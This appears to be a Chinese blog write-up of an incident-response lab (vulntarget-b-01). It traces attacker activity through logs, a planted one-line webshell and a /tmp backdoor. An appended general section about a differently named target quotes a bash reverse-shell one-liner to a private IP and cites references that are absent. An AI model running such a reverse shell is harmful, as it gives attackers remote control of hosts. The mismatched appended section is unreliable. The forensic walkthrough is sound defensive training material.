玄机靶场——应急响应-vulntarget-b-01

步骤

1、黑客是从哪个端口作为入口点的
2、黑客使用了什么工具探测了ssh服务
3、黑客使用了什么工具扫描了日录(格式fag{工具/版本号})
4、黑客成功登录后台的IP地址?
5、黑客上传的木马连接密钥是什么?
6、黑客留下的后门文件的路径为?

1、黑客是从哪个端口作为入口点的

可以使用ss -lnup进行查看被监听的端口

使用cat install.sh进行查看这个脚本,这里是使用宝塔作为控制面板的,在宝塔的脚本里面,可以看到宝塔打开的所以端口命令,与上图进行比较,可以发现81端口不是宝塔默认打开的端口,所以认为黑客是将81端口作为他的监控端口和入口点的

2、黑客使用了什么工具探测了ssh服务

使用cd /www/wwwlogs

cat access.log查看网页的日志文件,可以发现Nmap,所以黑客使用的是Namp作为探测工具

3、黑客使用了什么工具扫描了日录(格式fag{工具/版本号})

接着对同目录下的127.0.0.1.log文件进行查看,发现了gobuster/3.6,这是一款子域名挖掘工具

4、黑客成功登录后台的IP地址?

如上图,一般扫描工具的主机一般是登录的IP地址,所以登录后台的ip地址为192.168.83.1

5、黑客上传的木马连接密钥是什么?

使用命令将含有gobu的日志全部过滤掉,然后再进行查看,发现有GET传参和POST传参

发现有GET传参和POST传参,先对POST传参进行查看

这里有可疑信息

这里分析一下,黑客使用账号和密码登录进去之后,黑客进行修改了index.php文件

使用命令cd /www/wwwroot/jizhi

cat index.php进行查看index.php,发现了有一个一句话木马存在

所以密钥为Admin@@

6、黑客留下的后门文件的路径为?

切换到/tmp公共目录下

发现有一个index.elf文件

将这个文件放到云沙盒进行查看

可以知道它是一个后门文件

黑客留下的后门文件的路径为/tmp/index.elf

### 应急响应中的漏洞目标与配置信息 在应急响应过程中,针对 `vulntarget j 01` 的配置和漏洞目标分析可以分为以下几个方面: #### 1. 环境概述 此题目所描述的是一个中型环境下的应急响应场景[^1]。其核心目的是通过重现攻击路径来帮助应急人员快速定位并确认受害主机中存在的安全漏洞。 #### 2. 攻击路径还原 为了有效还原攻击路径,通常需要关注以下几点: - **日志文件审查**:检查系统日志(如 `/var/log/auth.log`, `/var/log/syslog`),寻找异常登录记录或其他可疑活动。 - **网络连接状态**:利用命令如 `netstat -anp | grep ESTABLISHED` 或者更高级工具(如 Wireshark)捕获实时流量数据。 - **恶意脚本检测**:例如给定的 Bash 脚本可能被用于建立反向 Shell 连接[^3]: ```bash bash -c 'exec bash -i &>/dev/tcp/192.168.138.133/8888 <&1' ``` #### 3. CMS 实战案例解析 根据提供的 Linux 实战题解,在第五章节提到的具体 Flag 值表明该任务涉及到了某种 Web CMS 漏洞利用过程[^2]。此类问题往往源于未及时更新软件版本或者错误的安全配置。 #### 4. 安全加固建议 基于上述发现,可采取如下措施加强防护能力: - 更新所有已知存在风险的应用程序至最新稳定版; - 关闭不必要的服务端口减少暴露面; - 设置强密码策略并启用双因素认证机制; - 对敏感操作实施访问控制列表(ACL),仅允许授权IP地址范围内的请求进入内部网络区域; #### 结论 综上所述,“vulntarget j 01”的主要工作围绕着识别潜在威胁源以及修复相应的弱点展开。这不仅考验技术实力同时也锻炼逻辑思维能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值